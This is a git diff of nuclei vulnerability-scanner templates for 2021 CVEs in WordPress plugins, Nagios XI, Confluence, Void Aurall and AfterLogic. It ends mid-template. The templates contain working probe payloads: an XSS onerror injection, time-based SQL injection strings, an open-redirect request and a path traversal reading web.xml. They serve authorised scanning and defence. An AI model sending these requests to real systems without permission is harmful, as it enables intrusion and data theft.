'contains(body, "give_user_login")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4a0a00473045022100b8b1bbb738779094f1c4803577aabec032f44d2bd14d740c5bc4dc129660ed1c0220446b58a14acbdfe6216958668bbfe39c82d48cc2aa45a2dd0645799000150e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25104.yaml b/nuclei-templates/CVE-2021/CVE-2021-25104.yaml index 9b75cc8d44..ece0c65050 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25104.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25104.yaml @@ -5,21 +5,32 @@ info: author: Akincibor severity: medium description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: Fixed in version 1.9.5. reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 - https://wordpress.org/plugins/ocean-extra/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25104 - remediation: Fixed in version 1.9.5. + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25104 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra + verified: true + max-request: 2 + vendor: oceanwp + product: ocean_extra + framework: wordpress + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -29,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/?step=demo&page=owp_setup&a"> HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -52,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 4a0a00473045022100e3443b56e8a05c597dc43a2aa8eb67debf30c8d4ae911a0a37658bb837881d2702200e78e6b22e247af5d76f5db33eb488b26dac3e21e943f38a4d4baa45bceb3afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25111.yaml b/nuclei-templates/CVE-2021/CVE-2021-25111.yaml new file mode 100644 index 0000000000..01f582930c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25111.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-25111 + +info: + name: WordPress English Admin <1.5.2 - Open Redirect + author: akincibor + severity: medium + description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. + remediation: | + Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. + reference: + - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25111 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25111 + cwe-id: CWE-601 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: english_wordpress_admin_project + product: english_wordpress_admin + framework: wordpress + tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25112.yaml b/nuclei-templates/CVE-2021/CVE-2021-25112.yaml deleted file mode 100644 index ead789b908..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25112.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2021-25112 - -info: - name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS - author: DhiyaneshDK - severity: medium - description: | - The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting - reference: - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-25112 - cwe-id: CWE-79 - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25114.yaml b/nuclei-templates/CVE-2021/CVE-2021-25114.yaml index b1513872af..6b5942531e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25114.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25114.yaml @@ -1,32 +1,44 @@ id: CVE-2021-25114 info: - name: Paid Memberships Pro < 2.6.7 - Unauthenticated Blind SQL Injection + name: WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection author: theamanrawat severity: critical description: | - The plugin does not escape the discount_code in one of its REST route (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection. + WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/6c25a5f0-a137-4ea5-9422-8ae393d7b76b - https://wordpress.org/plugins/paid-memberships-pro/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25114 + - https://www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25114 cwe-id: CWE-89 + epss-score: 0.0412 + epss-percentile: 0.91962 + cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 2 + vendor: strangerstudios + product: paid_memberships_pro + framework: wordpress google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - verified: "true" - tags: wp-plugin,wp,sqli,paid-memberships-pro,wpscan,cve,cve2021,wordpress + tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios -requests: +http: - raw: - | @timeout: 15s GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 Host: {{Hostname}} @@ -35,7 +47,8 @@ requests: - type: dsl dsl: - duration_1>=6 - - contains(all_headers_1, "application/json") + - contains(header_1, "application/json") - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and +# digest: 490a0046304402205779f4688b602f810729763c28227697e17fbe54eabdf2769e00c3efd62634dc0220099aece2ea83884ee11dd109d206c253835129f29b3ea2922f55c13bbcce1686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml b/nuclei-templates/CVE-2021/CVE-2021-25118.yaml deleted file mode 100644 index b82074a3bf..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-25118 - -info: - name: Yoast SEO < 17.3 - Path Disclosure - author: DhiyaneshDK - severity: medium - description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. - reference: - - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - - https://plugins.trac.wordpress.org/changeset/2608691 - remediation: Fixed in version 17.3 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-25118 - cwe-id: CWE-200 - tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" - - matchers-condition: and - matchers: - - type: regex - regex: - - '"path":"(.*)/wp-content\\(.*)","size' - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"path":"(.*)/wp-content\\(.*)","size' diff --git a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml b/nuclei-templates/CVE-2021/CVE-2021-25120.yaml deleted file mode 100644 index 28aa3f7856..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2021-25120 - -info: - name: Easy Social Feed < 6.2.7 - Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. - reference: - - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 - - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25120 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25120 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "'type' : ''" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25296.yaml b/nuclei-templates/CVE-2021/CVE-2021-25296.yaml index 602b2fab4f..bcf503b7ff 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25296.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25296.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25296 cwe-id: CWE-78 - epss-score: 0.89404 - epss-percentile: 0.98455 + epss-score: 0.89514 + epss-percentile: 0.98511 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev + tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: - raw: @@ -83,4 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 490a004630440220032f4e19e282ef6d684f1341055f3e4ca1b5e2e3c640f2c38b76fec6c6e2588b02203b49dcb0efa7bb798c4b75003af58f8efc4998a98d7bc62fae6ffa0058763b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206666d4036d4d35dab96e894b38ad9c5edf03bd115f6e5d9e2b93663420df328c0220408cb9f27506a076cc138fa9720eb3f0fc641f9eb0b01d3742742c5bc0c07c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25297.yaml b/nuclei-templates/CVE-2021/CVE-2021-25297.yaml index b09ed2d6ef..389f33f82b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25297.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25297.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 - epss-score: 0.89404 - epss-percentile: 0.98455 + epss-score: 0.90211 + epss-percentile: 0.98732 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,rce,oast,authenticated,msf,cve,cve2021,nagiosxi,kev + tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: - raw: @@ -83,4 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a0047304502203dbef0c11547f2fe56b11418c84fc2b7c0b75eed8f549500e54d7f06afc5828f022100d7bbc1213ad729e2820bf9d535b22a3a053449022612bd1297bdc47b09074b7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002c535c416c93bf3230b4b497297c11d4d1ee31297754e601903ba6730dfdae1022100a8503c90b036840ad6480ea87590c5fde3b4b3d809100390be430825d84803e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25298.yaml b/nuclei-templates/CVE-2021/CVE-2021-25298.yaml index 3dfe5e05cb..214437d510 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25298.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25298 cwe-id: CWE-78 - epss-score: 0.97378 - epss-percentile: 0.99892 + epss-score: 0.97349 + epss-percentile: 0.9988 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: packetstorm,oast,authenticated,msf,cve,cve2021,nagiosxi,rce,kev + tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios http: - raw: @@ -83,4 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a00473045022100c9d1c8b75d63d81daf696f5502efaa894f86a52b4fffde35dd51a75d9de943800220594ae60f511c619a7f202902d9b20dc91cd7cb2de2b08a90e4d7425cee7cf8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ffbd21c262951d6e67fbd7d2e110f6b43874fabb78cfbc0af65808cacffb342022100d72430ef1b99310c8ea24fa8e2fc77ed72875051b2f4d657e42cd2c2244c5630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25299.yaml b/nuclei-templates/CVE-2021/CVE-2021-25299.yaml index 4f0a766980..13c30457a9 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25299.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25299.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25299 cwe-id: CWE-79 epss-score: 0.96845 - epss-percentile: 0.99613 + epss-percentile: 0.99634 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: cve,cve2021,nagios,nagiosxi,xss,authenticated + tags: cve2021,cve,nagios,nagiosxi,xss,authenticated http: - raw: @@ -61,4 +61,4 @@ http: - 'name="nsp" value="(.*)">' internal: true part: body -# digest: 4a0a00473045022100b20343945a347258d41c3fd412a5ce974334346d1a86db1c856c37149a3c20910220118a21f833923794d2f0c08e420c1d5645f47870dd2aa06476772b0fe599b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d689aec24e353a8512a7a711f112d6a15becf87f58a454eef3116dbbe9f8d432022100c4b79ea5049b4b480e421cafdc165fe61ba55a10946eb5d9f61ce59d1ef8f5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25899.yaml b/nuclei-templates/CVE-2021/CVE-2021-25899.yaml index bfdaab1976..1042351d65 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25899.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25899.yaml @@ -5,34 +5,47 @@ info: author: edoardottt severity: high description: | - An issue was discovered in svc-login.php in Void Aural Rec Monitor 9.0.0.1. An unauthenticated attacker can send a crafted HTTP request to perform a blind time-based SQL Injection. The vulnerable parameter is param1. + Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 - https://nvd.nist.gov/vuln/detail/CVE-2021-25899 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 + epss-score: 0.50721 + epss-percentile: 0.9747 + cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: void + product: aurall_rec_monitor shodan-query: html:"AURALL" - tags: cve,cve2021,sqli,void,aurall + tags: cve2021,cve,sqli,void,aurall -requests: +http: - raw: - | + @timeout: 15s POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test + param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy¶m2=test matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and +# digest: 4a0a004730450220032725c31303f01d831554ead8dfbb845e5e5324a12f8fa5b6a83b473c5e565002210094b392e00a4f07522830b49db305a4c03bd5d331a4b9fb5384ab046552e98b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml index 9e43030b97..f2032f23ff 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml @@ -7,24 +7,25 @@ info: reference: - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - tags: cve,cve2021,confluence,atlassian,lfi + - https://jira.atlassian.com/browse/CONFSERVER-67893 + - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-26085 cwe-id: CWE-862 - + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2021,confluence,atlassian,lfi,kev requests: - method: GET path: - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: diff --git a/nuclei-templates/CVE-2021/cve-2021-26086.yaml b/nuclei-templates/CVE-2021/CVE-2021-26086.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-26086.yaml rename to nuclei-templates/CVE-2021/CVE-2021-26086.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-26292.yaml b/nuclei-templates/CVE-2021/CVE-2021-26292.yaml index 40733d25ae..5ecd600175 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26292.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26292.yaml @@ -12,12 +12,12 @@ info: classification: cve-id: CVE-2021-26292 metadata: - max-request: 1 verified: true - fofa-query: "X-Server: AfterlogicDAVServer" + max-request: 1 vendor: AfterLogic product: AfterLogic Aurora & WebMail - tags: cve,cve2021,afterlogic,path,disclosure + fofa-query: "X-Server: AfterlogicDAVServer" + tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic http: - raw: @@ -43,4 +43,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022060e039513b9863e1f87a2678e2005e83a77432d409bd3249dac7eab0de586e01022100b70fc76adcc36e8836210ea3b1da82e12a334c2463f8955d5ec9905247dd49ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad5306a2d12bd71a320ef1a609dc0fcc26696853a67e766b855fec5502950393022032de7c3a4f65e5633891b3f3495fd75c4e567f7b884cd001f47b0bb141e57037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26294.yaml b/nuclei-templates/CVE-2021/CVE-2021-26294.yaml index acdb763c22..e67e96c9ce 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26294.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26294.yaml @@ -9,19 +9,24 @@ info: reference: - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md - https://nvd.nist.gov/vuln/detail/CVE-2021-26294 + - https://github.com/Threekiii/Awesome-POC + - https://github.com/soosmile/POC + - https://github.com/tzwlhack/Vulnerability classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-26294 cwe-id: CWE-22 + epss-score: 0.25543 + epss-percentile: 0.96591 cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: afterlogic + product: aurora fofa-query: "X-Server: AfterlogicDAVServer" - vendor: AfterLogic - product: AfterLogic Aurora & WebMail - tags: cve,cve2021,afterlogic,exposure + tags: cve2021,cve,afterlogic,exposure,AfterLogic http: - raw: @@ -48,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220694ea7d2834dba154d0d9f06f8ad15eaf474c107c11c10f1ca470b90ccaf2605022039194e44efc258f702a4397af3625ca7057d8f0810c46edd550e80e32a2c0e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml b/nuclei-templates/CVE-2021/CVE-2021-26598.yaml deleted file mode 100644 index 2822629060..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2021-26598 - -info: - name: ImpressCMS - Incorrect Authorization - author: gy741,pdteam - severity: medium - description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). - reference: - - https://hackerone.com/reports/1081137 - - http://karmainsecurity.com/KIS-2022-03 - - https://github.com/ImpressCMS - - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 - metadata: - shodan-query: http.html:"ImpressCMS" - tags: cve,cve2021,impresscms,unauth,cms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2021-26598 - cwe-id: CWE-287 - -requests: - - raw: - - | - GET /misc.php?action=showpopups&type=friend HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - - - | - GET /include/findusers.php?token={{token}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_2 - words: - - 'last_login' - - 'user_regdate' - - 'uname' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token - internal: true - group: 1 - regex: - - "REQUEST' value='(.*?)'" - - 'REQUEST" value="(.*?)"' diff --git a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml new file mode 100644 index 0000000000..67a641543d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-26702 +info: + name: EPrints 3.4.2 XSS + author: ritikchaddha + severity: medium + description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI. + reference: + - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + - https://files.eprints.org/2548/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26702 + cwe-id: CWE-79 + tags: cve,cve2021,xss,eprints +requests: + - method: GET + path: + - 